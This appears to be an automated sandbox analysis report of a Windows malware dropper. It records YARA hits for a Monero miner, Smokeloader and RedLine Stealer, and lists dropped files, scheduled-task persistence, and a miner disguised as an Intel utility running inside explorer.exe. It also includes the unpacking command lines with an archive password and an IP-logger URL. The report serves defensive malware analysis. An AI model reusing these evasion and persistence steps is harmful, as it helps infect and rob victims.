Source: d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000585D000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868146778.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868658111.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869728348.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3863773219.000000000569F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869516834.0000000005A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://g-cleanit.hk
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: 352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/ipbefore
Source: ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000585D000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868146778.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868658111.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869728348.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3863773219.000000000569F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869516834.0000000005A31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1Pz8p7
Source: c359af6492.exe.14.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: 9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ea17d0b77a.exe, 0000002F.00000003.3358748084.0000000005AAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ea17d0b77a.exe, 0000002F.00000003.3358203921.00000000059B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: ea17d0b77a.exe, 0000002F.00000003.3358203921.00000000059B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.mozilla.org/about/AFIJJJJKJDHD
Source: 9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: 9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

System Summary

Malicious sample detected (through community Yara rule)

Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000002E.00000002.4037878938.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002E.00000002.4018196816.0000000000F39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects coinmining malware Author: ditekSHen

Drops password protected ZIP file

Source: file.bin.16.dr

Zip Entry: encrypted

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe0.14.dr	Static PE information: section name:
Source: random[1].exe0.14.dr	Static PE information: section name: .idata
Source: random[1].exe0.14.dr	Static PE information: section name:
Source: 352def4414.exe.14.dr	Static PE information: section name:
Source: 352def4414.exe.14.dr	Static PE information: section name: .idata
Source: 352def4414.exe.14.dr	Static PE information: section name:
Source: random[1].exe1.14.dr	Static PE information: section name:
Source: random[1].exe1.14.dr	Static PE information: section name: .idata
Source: random[1].exe1.14.dr	Static PE information: section name:
Source: d5cd5e4aa8.exe.14.dr	Static PE information: section name:
Source: d5cd5e4aa8.exe.14.dr	Static PE information: section name: .idata
Source: d5cd5e4aa8.exe.14.dr	Static PE information: section name:
Source: random[1].exe2.14.dr	Static PE information: section name:
Source: random[1].exe2.14.dr	Static PE information: section name: .idata
Source: random[1].exe2.14.dr	Static PE information: section name:
Source: ea17d0b77a.exe.14.dr	Static PE information: section name:
Source: ea17d0b77a.exe.14.dr	Static PE information: section name: .idata
Source: ea17d0b77a.exe.14.dr	Static PE information: section name:
Source: random[2].exe.14.dr	Static PE information: section name:
Source: random[2].exe.14.dr	Static PE information: section name: .idata
Source: 9434b989db.exe.14.dr	Static PE information: section name:
Source: 9434b989db.exe.14.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 20_2_009796AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,

20_2_009796AC

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B678BB	0_2_00B678BB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B68860	0_2_00B68860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B67049	0_2_00B67049
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B631A8	0_2_00B631A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B24B30	0_2_00B24B30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B24DE0	0_2_00B24DE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B62D10	0_2_00B62D10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B6779B	0_2_00B6779B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B57F36	0_2_00B57F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F778BB	3_2_00F778BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F78860	3_2_00F78860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F77049	3_2_00F77049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F731A8	3_2_00F731A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F34B30	3_2_00F34B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F34DE0	3_2_00F34DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F72D10	3_2_00F72D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F7779B	3_2_00F7779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00F67F36	3_2_00F67F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F778BB	4_2_00F778BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F78860	4_2_00F78860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F77049	4_2_00F77049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F731A8	4_2_00F731A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F34B30	4_2_00F34B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F34DE0	4_2_00F34DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F72D10	4_2_00F72D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F7779B	4_2_00F7779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 4_2_00F67F36	4_2_00F67F36
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_0099F13E	20_2_0099F13E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009924C0	20_2_009924C0
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_00995458	20_2_00995458
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009947AC	20_2_009947AC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009B8817	20_2_009B8817
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_00980DCC	20_2_00980DCC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_0097F1B4	20_2_0097F1B4
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_0097B114	20_2_0097B114
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_0098C278	20_2_0098C278
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009B3528	20_2_009B3528
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009A2578	20_2_009A2578
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009A066E	20_2_009A066E
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_0099D66C	20_2_0099D66C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_0098D858	20_2_0098D858
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009A99B8	20_2_009A99B8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009B49A5	20_2_009B49A5
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009A79DC	20_2_009A79DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_0099694C	20_2_0099694C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009AFA0C	20_2_009AFA0C
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009BDA30	20_2_009BDA30
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_00988CA8	20_2_00988CA8
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009BDC11	20_2_009BDC11
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_00987C68	20_2_00987C68
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_009BDD00	20_2_009BDD00
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_00996E08	20_2_00996E08
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_00978F18	20_2_00978F18
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_0098AF58	20_2_0098AF58

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00F480C0 appears 260 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00F4DF80 appears 36 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00B380C0 appears 130 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 39.3.Intel_PTT_EK_Recertification.exe.2804f500000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 40.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000002E.00000002.4037878938.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002E.00000002.4018196816.0000000000F39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9982171747275205
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9982171747275205
Source: random[1].exe0.14.dr	Static PE information: Section: lbajxhwa ZLIB complexity 0.9942148503970505
Source: 352def4414.exe.14.dr	Static PE information: Section: lbajxhwa ZLIB complexity 0.9942148503970505
Source: random[1].exe1.14.dr	Static PE information: Section: ewodcgyw ZLIB complexity 0.9902948848967298
Source: d5cd5e4aa8.exe.14.dr	Static PE information: Section: ewodcgyw ZLIB complexity 0.9902948848967298
Source: random[1].exe2.14.dr	Static PE information: Section: ZLIB complexity 0.997117133989726
Source: random[1].exe2.14.dr	Static PE information: Section: vznsjynp ZLIB complexity 0.9947025476983646
Source: ea17d0b77a.exe.14.dr	Static PE information: Section: ZLIB complexity 0.997117133989726
Source: ea17d0b77a.exe.14.dr	Static PE information: Section: vznsjynp ZLIB complexity 0.9947025476983646

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@84/46@0/11

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_0097AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		20_2_0097AC74
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 20_2_00981D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,		20_2_00981D04

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 20_2_0097ABB0 GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,

20_2_0097ABB0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"

Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Process created: C:\Windows\explorer.exe

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1018747001\352def4414.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: ea17d0b77a.exe, 0000002F.00000003.3290869974.00000000059B9000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3291620303.000000000599D000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3317040287.00000000059AF000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3855365717.00000000053CD000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524217767.00000000053D9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 50%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe "C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe"
Source: C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
